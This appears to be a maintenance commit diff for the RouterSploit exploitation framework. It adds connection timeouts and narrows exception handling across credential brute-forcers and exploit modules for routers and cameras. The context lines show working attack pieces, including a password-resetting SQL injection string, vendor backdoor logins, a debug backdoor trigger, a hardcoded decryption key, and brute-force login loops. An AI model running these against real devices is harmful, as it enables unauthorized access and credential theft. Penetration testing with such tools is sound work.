Adding timeouts (#334)

* Adding timeouts * Adding exceptions * Fixing E741

Adding timeouts (#334)
* Adding timeouts * Adding exceptions * Fixing E741
42263a70 · Marcin Bury · GitHub · bbbf7911 · 42263a70 · 42263a70
Commit 42263a70 authored Oct 23, 2017 by Marcin Bury Committed by GitHub Oct 23, 2017
34 changed files
--- a/routersploit/interpreter.py
+++ b/routersploit/interpreter.py
@@ -322,7 +322,7 @@ class RoutersploitInterpreter(BaseInterpreter):
        except KeyboardInterrupt:
            utils.print_info()
            utils.print_error("Operation cancelled by user")
-        except:
+        except Exception:
            utils.print_error(traceback.format_exc(sys.exc_info()))
    def command_exploit(self, *args, **kwargs):

--- a/routersploit/modules/creds/ftp_bruteforce.py
+++ b/routersploit/modules/creds/ftp_bruteforce.py
@@ -60,7 +60,7 @@ class Exploit(exploits.Exploit):
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ftp.close()
            return
-        except:
+        except Exception:
            pass
        ftp.close()
@@ -121,7 +121,7 @@ class Exploit(exploits.Exploit):
                    print_success("Target: {}:{} {}: Authentication succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                    self.credentials.append((self.target, self.port, user, password))
-                except:
+                except Exception:
                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                ftp.close()

--- a/routersploit/modules/creds/ftp_default.py
+++ b/routersploit/modules/creds/ftp_default.py
@@ -58,7 +58,7 @@ class Exploit(exploits.Exploit):
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ftp.close()
            return
-        except:
+        except Exception:
            pass
        ftp.close()
@@ -97,7 +97,7 @@ class Exploit(exploits.Exploit):
                    try:
                        ftp.connect(self.target, port=int(self.port), timeout=10)
                        break
-                    except:
+                    except Exception:
                        print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
                        retries += 1
@@ -113,7 +113,7 @@ class Exploit(exploits.Exploit):
                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                    self.credentials.append((self.target, self.port, user, password))
-                except:
+                except Exception:
                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                ftp.close()

--- a/routersploit/modules/creds/http_form_bruteforce.py
+++ b/routersploit/modules/creds/http_form_bruteforce.py
@@ -125,15 +125,15 @@ class Exploit(exploits.Exploit):
            postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
            r = requests.post(url, headers=headers, data=postdata, verify=False)
-            l = len(r.text)
+            length = len(r.text)
            if i == 0:
-                self.invalid = {"min": l, "max": l}
+                self.invalid = {"min": length, "max": length}
-            if l < self.invalid["min"]:
+            if length < self.invalid["min"]:
-                self.invalid["min"] = l
+                self.invalid["min"] = length
-            elif l > self.invalid["max"]:
+            elif length > self.invalid["max"]:
-                self.invalid["max"] = l
+                self.invalid["max"] = length
    def detect_form(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path()))
@@ -202,9 +202,9 @@ class Exploit(exploits.Exploit):
                postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
                r = requests.post(url, headers=headers, data=postdata, verify=False)
-                l = len(r.text)
+                length = len(r.text)
-                if l < self.invalid["min"] or l > self.invalid["max"]:
+                if length < self.invalid["min"] or length > self.invalid["max"]:
                    if boolify(self.stop_on_success):
                        running.clear()

--- a/routersploit/modules/creds/http_form_default.py
+++ b/routersploit/modules/creds/http_form_default.py
@@ -119,15 +119,15 @@ class Exploit(exploits.Exploit):
            postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
            r = requests.post(url, headers=headers, data=postdata, verify=False)
-            l = len(r.text)
+            length = len(r.text)
            if i == 0:
-                self.invalid = {"min": l, "max": l}
+                self.invalid = {"min": length, "max": length}
-            if l < self.invalid["min"]:
+            if length < self.invalid["min"]:
-                self.invalid["min"] = l
+                self.invalid["min"] = length
-            elif l > self.invalid["max"]:
+            elif length > self.invalid["max"]:
-                self.invalid["max"] = l
+                self.invalid["max"] = length
    def detect_form(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path()))
@@ -196,9 +196,9 @@ class Exploit(exploits.Exploit):
                postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
                r = requests.post(url, headers=headers, data=postdata, verify=False)
-                l = len(r.text)
+                length = len(r.text)
-                if l < self.invalid["min"] or l > self.invalid["max"]:
+                if length < self.invalid["min"] or length > self.invalid["max"]:
                    if boolify(self.stop_on_success):
                        running.clear()

--- a/routersploit/modules/creds/ssh_bruteforce.py
+++ b/routersploit/modules/creds/ssh_bruteforce.py
@@ -61,7 +61,7 @@ class Exploit(exploits.Exploit):
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ssh.close()
            return
-        except:
+        except Exception:
            pass
        ssh.close()

--- a/routersploit/modules/creds/ssh_default.py
+++ b/routersploit/modules/creds/ssh_default.py
@@ -58,7 +58,7 @@ class Exploit(exploits.Exploit):
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ssh.close()
            return
-        except:
+        except Exception:
            pass
        ssh.close()

--- a/routersploit/modules/creds/telnet_bruteforce.py
+++ b/routersploit/modules/creds/telnet_bruteforce.py
@@ -53,10 +53,10 @@ class Exploit(exploits.Exploit):
    @multi
    def attack(self):
        try:
-            tn = telnetlib.Telnet(self.target, self.port)
+            tn = telnetlib.Telnet(self.target, self.port, timeout=10)
            tn.expect(["login: ", "Login: "], 5)
            tn.close()
-        except:
+        except Exception:
            print_error("Connection error {}:{}".format(self.target, self.port))
            return
@@ -97,7 +97,7 @@ class Exploit(exploits.Exploit):
                retries = 0
                while retries < 3:
                    try:
-                        tn = telnetlib.Telnet(self.target, self.port)
+                        tn = telnetlib.Telnet(self.target, self.port, timeout=10)
                        tn.expect(["Login: ", "login: "], 5)
                        tn.write(user + "\r\n")
                        tn.expect(["Password: ", "password"], 5)

--- a/routersploit/modules/creds/telnet_default.py
+++ b/routersploit/modules/creds/telnet_default.py
@@ -51,10 +51,10 @@ class Exploit(exploits.Exploit):
    @multi
    def attack(self):
        try:
-            tn = telnetlib.Telnet(self.target, self.port)
+            tn = telnetlib.Telnet(self.target, self.port, timeout=10)
            tn.expect(["login: ", "Login: "], 5)
            tn.close()
-        except:
+        except Exception:
            print_error("Connection error {}:{}".format(self.target, self.port))
            return
@@ -89,7 +89,7 @@ class Exploit(exploits.Exploit):
                retries = 0
                while retries < 3:
                    try:
-                        tn = telnetlib.Telnet(self.target, self.port)
+                        tn = telnetlib.Telnet(self.target, self.port, timeout=10)
                        tn.expect(["Login: ", "login: "], 5)
                        tn.write(user + "\r\n")
                        tn.expect(["Password: ", "password"], 5)

--- a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
+++ b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
            print_success("Target appears to be vulnerable...")
            try:
-                conn = telnetlib.Telnet(self.target, self.telnet_port)
+                conn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
                conn.read_until("Username: ")
                conn.write("';update user set password='a';--\r\n")  # This changes all the passwords to 'a'
                conn.read_until("Password: ")
@@ -55,7 +55,7 @@ class Exploit(exploits.Exploit):
                print_error("Exploit failed. Could not log in.")
            try:
-                conn = telnetlib.Telnet(self.target, 20000)
+                conn = telnetlib.Telnet(self.target, 20000, timeout=10)
                conn.read_until("login: ")
                conn.write("root\r\n")
                conn.read_until("Password: ")
@@ -71,7 +71,7 @@ class Exploit(exploits.Exploit):
    @mute
    def check(self):
        try:
-            conn = telnetlib.Telnet(self.target, self.telnet_port)
+            conn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            return 'Grandstream' in conn.read_until("login:")
        except Exception:
            return False
--- a/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py
+++ b/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py
@@ -63,7 +63,7 @@ class Exploit(exploits.Exploit):
                for chunk in response.iter_content(chunk_size=100):
                    if "admin" in chunk:
                        print_success(chunk)
-            except:
+            except Exception:
                print_error("Exploit failed - could not read /proc/kcore")
    @mute

--- a/routersploit/modules/exploits/routers/billion/5200w_rce.py
+++ b/routersploit/modules/exploits/routers/billion/5200w_rce.py
@@ -134,10 +134,10 @@ class Exploit(exploits.Exploit):
        print_status("Trying to connect to the telnet server...")
        try:
-            tn = telnetlib.Telnet(target, self.telnet_port)
+            tn = telnetlib.Telnet(target, self.telnet_port, timeout=10)
            tn.interact()
            tn.close()
-        except:
+        except Exception:
            print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnet_port))
    @mute

--- a/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py
+++ b/routersploit/modules/exploits/routers/billion/7700nr4_password_disclosure.py
@@ -57,7 +57,7 @@ class Exploit(exploits.Exploit):
            try:
                print_status("Trying to base64 decode")
                password = base64.b64decode(res[0])
-            except:
+            except Exception:
                print_error("Exploit failed - could not decode password")
                return

--- a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
+++ b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
@@ -184,11 +184,13 @@ class Exploit(exploits.Exploit):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.settimeout(10.0)
            s.connect((self.target, int(self.telnet_port)))
            print_status("Connection OK")
            print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
-        except:
+        except Exception:
            print_error("Connection failed")
            return
@@ -209,9 +211,9 @@ class Exploit(exploits.Exploit):
        if self.action == 'set':
            print_status("Connecting to Telnet service...")
            try:
-                t = telnetlib.Telnet(self.target, int(self.telnet_port))
+                t = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
                t.interact()
-            except:
+            except Exception:
                print_error("Exploit failed")
        else:
            print_status("Check if Telnet authentication was set back")

--- a/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
+++ b/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
                ssh.connect(target, self.ssh_port, timeout=5, username=random_text(8), password=random_text(8))
            except paramiko.AuthenticationException:
                    return True  # target is vulnerable
-            except:
+            except Exception:
                pass
        return False  # target is not vulnerable
@@ -127,7 +127,7 @@ class Exploit(exploits.Exploit):
        try:
            http_request(method="POST", url=url, files=multipart_form_data, session=self.session)
-        except:
+        except Exception:
            pass
        return
@@ -157,7 +157,7 @@ class Exploit(exploits.Exploit):
        target = self.target.replace("http://", "").replace("https://", "")
        try:
            ssh.connect(target, self.ssh_port, timeout=5, username=username, password=password)
-        except:
+        except Exception:
            ssh.close()
        else:
            print_success("SSH - Successful authentication")

--- a/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py
+++ b/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py
@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
        try:
            response = sock.recv(2048)
-        except:
+        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
        try:
            response = sock.recv(2048)
-        except:
+        except Exception:
            return False  # target is not vulnerable
        if len(response) and "UseUserCredential" in response:

--- a/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
+++ b/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
@@ -84,7 +84,7 @@ class Exploit(exploits.Exploit):
            if len(res):
                try:
                    b64decode(res[0])  # checking if data is base64 encoded
-                except:
+                except Exception:
                    return False  # target is not vulnerable
            else:
                return False  # target is not vulnerable

--- a/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
@@ -78,7 +78,7 @@ class Exploit(exploits.Exploit):
            sock.send(buf)
            response = sock.recv(65535)
            sock.close()
-        except:
+        except Exception:
            return False  # target is not vulnerable
        if "Linux, UPnP/1.0, DIR-" in response:

--- a/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
@@ -45,6 +45,8 @@ class Exploit(exploits.Exploit):
               'MAN:"ssdp:discover"\r\n\r\n')
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        s.settimeout(20.0)
        s.connect((self.target, 1900))
        s.send(buf)
        s.close()

--- a/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
+++ b/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
@@ -44,7 +44,7 @@ class Exploit(exploits.Exploit):
        try:
            sock.sendto("HELODBG", (self.target, 39889))
            response = sock.recv(1024)
-        except:
+        except Exception:
            pass
        sock.close()
@@ -54,9 +54,9 @@ class Exploit(exploits.Exploit):
            print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
            try:
-                tn = telnetlib.Telnet(self.target, self.telnet_port)
+                tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
                tn.interact()
-            except:
+            except Exception:
                print_error("Exploit failed - could not connect to the telnet service")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
@@ -73,7 +73,7 @@ class Exploit(exploits.Exploit):
            if "Hello" in response:
                sock.sendto("BYEDBG", (self.target, 39889))
                return True  # target is vulnerable
-        except:
+        except Exception:
            pass
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
-        except:
+        except Exception:
            print_error("Exploit Failed - SSH Service is down")
            return
@@ -55,7 +55,7 @@ class Exploit(exploits.Exploit):
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
-        except:
+        except Exception:
            print_status("Error with Existing Session. Wait few minutes.")
            return
@@ -64,7 +64,7 @@ class Exploit(exploits.Exploit):
            print_success("Exploit succeeded")
            ssh_interactive(client)
-        except:
+        except Exception:
            print_error("Exploit failed")
            return
@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
-        except:
+        except Exception:
            return False  # target is not vulnerable
        trans = client.get_transport()
@@ -85,12 +85,12 @@ class Exploit(exploits.Exploit):
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
-        except:
+        except Exception:
            return None  # could not verify
        try:
            trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
-        except:
+        except Exception:
            return False  # target is not vulnerable
        return True  # target is vulnerable

--- a/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
+++ b/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
-        except:
+        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
@@ -95,7 +95,7 @@ class Exploit(exploits.Exploit):
        try:
            response = sock.recv(1024)
-        except:
+        except Exception:
            return False  # target is not vulnerable
        if len(response):

--- a/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py
@@ -45,7 +45,7 @@ class Exploit(exploits.Exploit):
        try:
            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
-        except:
+        except Exception:
            ssh.close()
        else:
            print_success("SSH - Successful authentication")
@@ -53,7 +53,7 @@ class Exploit(exploits.Exploit):
            return
        try:
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
@@ -72,7 +72,7 @@ class Exploit(exploits.Exploit):
                    tn.interact()
            tn.close()
-        except:
+        except Exception:
            print_error("Connection Error")
            return
@@ -83,13 +83,13 @@ class Exploit(exploits.Exploit):
        try:
            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
-        except:
+        except Exception:
            ssh.close()
        else:
            return True
        try:
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
@@ -107,7 +107,7 @@ class Exploit(exploits.Exploit):
                    tn.close()
                    return True
            tn.close()
-        except:
+        except Exception:
            return False
        return False
--- a/routersploit/modules/exploits/routers/multi/heartbleed.py
+++ b/routersploit/modules/exploits/routers/multi/heartbleed.py
@@ -132,9 +132,11 @@ class Exploit(exploits.Exploit):
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.settimeout(10.0)
            s.connect((self.target, int(self.port)))
            s.send(self.h2bin(self.hello))
-        except:
+        except Exception:
            print_error("Connection failed: {}:{}".format(self.target, self.port))
            return
@@ -157,6 +159,8 @@ class Exploit(exploits.Exploit):
    def check(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.settimeout(10.0)
            s.connect((self.target, int(self.port)))
            s.send(self.h2bin(self.hello))
        except socket.error:

--- a/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py
+++ b/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py
@@ -252,7 +252,7 @@ class Exploit(exploits.Exploit):
            try:
                ssh.connect(self.target, self.ssh_port, timeout=5, username=self.valid['user'], pkey=pkey)
-            except:
+            except Exception:
                ssh.close()
                print_error("Device seems to be not vulnerable")
            else:
@@ -276,7 +276,7 @@ class Exploit(exploits.Exploit):
            try:
                ssh.connect(self.target, self.ssh_port, timeout=5, username=key['user'], pkey=pkey)
-            except:
+            except Exception:
                ssh.close()
            else:
                self.valid = key

--- a/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
+++ b/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
@@ -51,7 +51,7 @@ class Exploit(exploits.Exploit):
            sock.sendto(payload, (self.target, 53413))
            response = sock.recv(1024)
            return response[8:]
-        except:
+        except Exception:
            pass
        return ""
@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
        try:
            sock.sendto(payload, (self.target, 53413))
            response = sock.recv(1024)
-        except:
+        except Exception:
            pass
        if response.endswith("\xD0\xA5Login:"):

--- a/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
+++ b/routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
@@ -71,9 +71,9 @@ class Exploit(exploits.Exploit):
    @staticmethod
    def decrypt_backup(backup):
        key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
-        l = (len(backup) / 16) * 16
+        length = (len(backup) / 16) * 16
        cipher = AES.new(key, AES.MODE_ECB, '\x00' * 16)
-        plain = cipher.decrypt(backup[0:l])
+        plain = cipher.decrypt(backup[0:length])
        return plain
    @mute

--- a/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
+++ b/routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
@@ -104,7 +104,7 @@ class Exploit(exploits.Exploit):
            tn.write(self.remote_pass + '\r\n')
            response = tn.read_until("Login not allowed", 10)
            tn.close()
-        except:
+        except Exception:
            return ""
        return response
@@ -115,7 +115,7 @@ class Exploit(exploits.Exploit):
            s.settimeout(3)
            s.connect((self.target, port))
            return True
-        except:
+        except Exception:
            return False
        finally:
            s.close()

--- a/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py
+++ b/routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py
@@ -65,9 +65,9 @@ class Exploit(exploits.Exploit):
        return passwd
    def parse(self, data):
-        l = data.split('\r\n')
+        length = data.split('\r\n')
-        del l[0]
+        del length[0]
-        for item in l:
+        for item in length:
            try:
                if 'authKey' in item:
                    authKey = item.split()[1]
@@ -75,7 +75,7 @@ class Exploit(exploits.Exploit):
                    cPskSecret = item.split()[1]
                if 'cUsrPIN' in item:
                    cUsrPIN = item.split()[1]
-            except:
+            except Exception:
                pass
        return authKey, cPskSecret, cUsrPIN

--- a/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py
+++ b/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py
@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
    def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -60,13 +60,13 @@ class Exploit(exploits.Exploit):
                    print_error("Exploit failed")
            tn.close()
-        except:
+        except Exception:
            print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
    @mute
    def check(self):
        try:
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -81,7 +81,7 @@ class Exploit(exploits.Exploit):
            else:
                if "<DM name=" in res:
                    return True  # target is vulnerable
-        except:
+        except Exception:
            return False  # target is not vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/routers/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/routers/zte/f660_config_disclosure.py
@@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
    def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, 23, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -57,13 +57,13 @@ class Exploit(exploits.Exploit):
                    print_error("Exploit failed")
            tn.close()
-        except:
+        except Exception:
            print_error("Connection error: {}:{}".format(self.target, 23))
    @mute
    def check(self):
        try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, 23, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -78,7 +78,7 @@ class Exploit(exploits.Exploit):
            else:
                if any(map(lambda x: x in res, ["<DM name="])):
                    return True  # target is vulnerable
-        except:
+        except Exception:
            return False  # target is not vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/routers/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/routers/zte/f6xx_default_root.py
@@ -40,7 +40,7 @@ class Exploit(exploits.Exploit):
    def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -60,13 +60,13 @@ class Exploit(exploits.Exploit):
                    print_error("Exploit failed")
            tn.close()
-        except:
+        except Exception:
            print_error("Connection error {}:{}".format(self.target, self.telnet_port))
    @mute
    def check(self):
        try:
-            tn = telnetlib.Telnet(self.target, self.telnet_port)
+            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -81,7 +81,7 @@ class Exploit(exploits.Exploit):
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    return True  # target is vulnerable
-        except:
+        except Exception:
            return False  # target is not vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/routers/zte/zxv10_rce.py
+++ b/routersploit/modules/exploits/routers/zte/zxv10_rce.py
@@ -82,7 +82,7 @@ class Exploit(exploits.Exploit):
                    res = res1 + res2
                    if res[0] != "</textarea>":
                        return res[0]
-        except:
+        except Exception:
            pass
        return ""
@@ -92,7 +92,7 @@ class Exploit(exploits.Exploit):
        try:
            response = http_request("GET", url, self.session)
-        except:
+        except Exception:
            return
        # Check for Model Name
@@ -140,7 +140,7 @@ class Exploit(exploits.Exploit):
                if "Username" not in response.text and "Password" not in response.text:
                    print_success("Successful authentication")
                    return True
-        except:
+        except Exception:
            pass
        return False

--- a/routersploit/shell.py
+++ b/routersploit/shell.py
@@ -92,7 +92,7 @@ def shell(exploit, architecture="", method="", payloads=None, **params):
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
-                            except:
+                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break